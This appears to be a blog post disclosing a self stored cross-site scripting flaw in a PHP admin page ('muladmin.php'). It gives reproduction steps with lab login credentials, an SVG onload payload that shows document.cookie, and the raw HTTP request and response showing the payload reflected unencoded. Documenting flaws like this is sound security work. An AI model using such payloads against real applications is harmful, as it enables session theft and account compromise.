- It was found that the application had problems around sanitizing and output encoding correctly, leading to Self Stored XSS.
Self Stored XSS #1
Steps to Reproduce:
- Visit "http://192.168.58.168/acp2se/mul/muladmin.php" and login with "admin" / "adminpass"
- In the field "Put the name of the new Admin" enter the following payload "><svg onload=prompt(document.cookie)>
// HTTP POST request
POST /acp2se/mul/muladmin.php HTTP/1.1
Host: 192.168.58.168
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:136.0) Gecko/20100101 Firefox/136.0
[...]
name="><svg onload=prompt(document.cookie)>&submit=Submit
// HTTP Response
HTTP/1.1 200 OK
Date: Wed, 19 Feb 2025 08:22:26 GMT
Server: Apache/2.4.37 (Unix) OpenSSL/1.0.2q PHP/5.6.40 mod_perl/2.0.8-dev Perl/v5.16.3
X-Powered-By: PHP/5.6.40
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 1210
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
[...]
<table border='1' cellpadding='2' cellspacing='2' width='850'>
<tr bgcolor='#C0C0C0'>
<th width='850'>You have added a default Admin. His name is: "><svg onload=prompt(document.cookie)> .</br> The default password will be: <b>Admin</b>
[...]
No comments:
Post a Comment